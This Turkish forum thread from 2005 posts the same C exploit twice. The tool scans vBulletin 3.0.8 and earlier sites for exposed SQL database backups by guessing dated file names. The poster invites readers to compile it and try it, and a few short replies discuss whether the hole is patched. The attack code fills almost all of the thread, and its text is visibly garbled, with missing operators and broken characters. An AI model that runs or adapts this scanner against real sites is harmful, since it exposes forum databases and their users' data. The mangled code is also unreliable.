IRC ve mIRC Kullanıcılarının Buluşma Noktası
  Mobil Sohbet, Sohbet ve Sohbet Odaları




Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 02 Kasım 2005, 03:10   #1
MichaelNyc
Guest
MichaelNyc - ait Kullanıcı Resmi (Avatar)
Vbulletin backup.php Exploit/Bug{!}


-- Sponsor Baglantı --


PHP Kod:   Kodu kopyalamak için üzerine çift tıklayın!
Örnek exploit  ; 

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 80

usage(char *name){
printf("vbulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! xxxxxx.com\n" ) ;
rintf("usage: %s -h hostname/ip -p /path/ \n",name);
exit(
0);
}

char *getdate(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%m-%d-%Y"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

char *getdate2(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%Y-%d-%m"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

char *getdate3(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%d-%m-%Y"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

main(int argcchar *argv[]) {

char buffer[1000],host[255],path[255],dog[255],c;
int sdrci=0d=0b;
struct sockaddr_in localAddrservAddr;
struct hostent *h;

if ( 
argc 5) {
usage(argv[0]);
}

//m00 m00 ty /str0ke
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: we want your backups - milw0rm\r\n"
"Connection: close\r\n\r\n"
;

while ((
getopt (argcargv"h:p:" ) ) != EOF)
switch(
c)
{
case &
#8217;h’:
strncpy(host,optarg,sizeof(host));
break;
case &
#8217;p’:
strncpy(path,optarg,sizeof(path));
break;
}

gethostbyname(host);

if(
h==NULL) {
printf("Unknown Host ’%s’\n",host);
exit(
1);
}

printf("Trying To Connect To [%s]\n",host);
while(
1){
servAddr.sin_family h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addrh->h_addr_list[0], h->h_length);
servAddr.sin_port htons(SERVER_PORT);
sd socket(AF_INETSOCK_STREAM0);

if(
sd<0) {
perror("Can Not Open The Socket\n" ) ;
exit(
1);
}

localAddr.sin_family AF_INET;
localAddr.sin_addr.s_addr htonl(INADDR_ANY);
localAddr.sin_port htons(0);

rc bind(sd, (struct sockaddr *) &localAddrsizeof(localAddr));

if(
rc<0) {
printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
perror("error " ) ;
exit(
1);
}

rc connect(sd, (struct sockaddr *) &servAddrsizeof(servAddr));

if(
rc<0) {
perror("cannot connect\n" ) ;
exit(
1);
}
memset(buffer,0,sizeof(buffer));

if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate(i),host,http);
} else if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate2(i),host,http);
} else if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate3(i),host,http);
}

rc send(sd,bufferstrlen(buffer), 0);
memset(buffer,0,sizeof(buffer));

while(
1)
{
rc=recv(sd,buffer,sizeof(buffer),0);
if(
strstr(buffer,"404" ) ) break;
if(
strstr(buffer,"200 OK" ) )
{
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate(i));
}
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate2(i));
}
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate3(i));
}
exit(
0);
}
memset(buffer,0,sizeof(buffer));
}
close(sd);

if ( 
) {
d++;
} else {
d=0;
i++;
}
}
}


DipNotALINTIDIR 


.c formatinda kayit edip deneyin
PHP Kod:   Kodu kopyalamak için üzerine çift tıklayın!
&#214;rnek exploit  ; 

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 80

usage(char *name){
printf("vbulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! xxxxxx.com\n" ) ;
rintf("usage: %s -h hostname/ip -p /path/ \n",name);
exit(
0);
}

char *getdate(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%m-%d-%Y"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

char *getdate2(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%Y-%d-%m"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

char *getdate3(int b){
static 
char datestring[40];
time_t ttt;
int minustime;
minustime=86400 b;
ttt=time(NULL)- minustime;
strftime (datestringsizeof(datestring), "%d-%m-%Y"localtime(&ttt));
printf("Searching: forumbackup-%s.sql\n"datestring);
return(
datestring);
}

main(int argcchar *argv[]) {

char buffer[1000],host[255],path[255],dog[255],c;
int sdrci=0d=0b;
struct sockaddr_in localAddrservAddr;
struct hostent *h;

if ( 
argc 5) {
usage(argv[0]);
}

//m00 m00 ty /str0ke
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: we want your backups - milw0rm\r\n"
"Connection: close\r\n\r\n"
;

while ((
getopt (argcargv"h:p:" ) ) != EOF)
switch(
c)
{
case &
#8217;h’:
strncpy(host,optarg,sizeof(host));
break;
case &
#8217;p’:
strncpy(path,optarg,sizeof(path));
break;
}

gethostbyname(host);

if(
h==NULL) {
printf("Unknown Host ’%s’\n",host);
exit(
1);
}

printf("Trying To Connect To [%s]\n",host);
while(
1){
servAddr.sin_family h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addrh->h_addr_list[0], h->h_length);
servAddr.sin_port htons(SERVER_PORT);
sd socket(AF_INETSOCK_STREAM0);

if(
sd<0) {
perror("Can Not Open The Socket\n" ) ;
exit(
1);
}

localAddr.sin_family AF_INET;
localAddr.sin_addr.s_addr htonl(INADDR_ANY);
localAddr.sin_port htons(0);

rc bind(sd, (struct sockaddr *) &localAddrsizeof(localAddr));

if(
rc<0) {
printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
perror("error " ) ;
exit(
1);
}

rc connect(sd, (struct sockaddr *) &servAddrsizeof(servAddr));

if(
rc<0) {
perror("cannot connect\n" ) ;
exit(
1);
}
memset(buffer,0,sizeof(buffer));

if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate(i),host,http);
} else if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate2(i),host,http);
} else if ( 
== ) {
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate3(i),host,http);
}

rc send(sd,bufferstrlen(buffer), 0);
memset(buffer,0,sizeof(buffer));

while(
1)
{
rc=recv(sd,buffer,sizeof(buffer),0);
if(
strstr(buffer,"404" ) ) break;
if(
strstr(buffer,"200 OK" ) )
{
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate(i));
}
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate2(i));
}
if ( 
== ) {
printf("Database backup found: %s%sforumbackup-%s.sql\n"hostpathgetdate3(i));
}
exit(
0);
}
memset(buffer,0,sizeof(buffer));
}
close(sd);

if ( 
) {
d++;
} else {
d=0;
i++;
}
}
}


DipNotALINTIDIR 


.c formatinda kayit edip deneyin

Konu MichaelNyc tarafından (02 Kasım 2005 Saat 03:13 ) değiştirilmiştir.
  Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
radyo44.com.tr
Alt 18 Aralık 2005, 17:29   #2
Çevrimdışı
Eksİk





Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.

exploit EKSİK

  Alıntı ile Cevapla

Alt 18 Aralık 2005, 21:26   #3
Çevrimdışı



Zaten a&#231;ık kapatılmıştır...

  Alıntı ile Cevapla

Alt 19 Aralık 2005, 01:37   #4
Çevrimdışı



Kardeşim sen kapatırsında herkez kapamaz
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.

  Alıntı ile Cevapla

Alt 19 Aralık 2005, 03:00   #5
Çevrimdışı



Ben değil a&#231;ığı kapatan vBulletin coderleri...
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.

  Alıntı ile Cevapla

Alt 19 Aralık 2005, 05:58   #6
Çevrimdışı



İstedikleri Kapasınlar Lisansız Piyasada o Kadar Vbulletin warki

  Alıntı ile Cevapla

Cevapla

Etiketler
backupphp, exploit or bug, exploitbug, vbulletin

Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
FreeBSD Root Exploit Güvenlik Açığı Ocean Güvenlik ve Güvenlik Açıkları 0 16 Mayıs 2010 11:32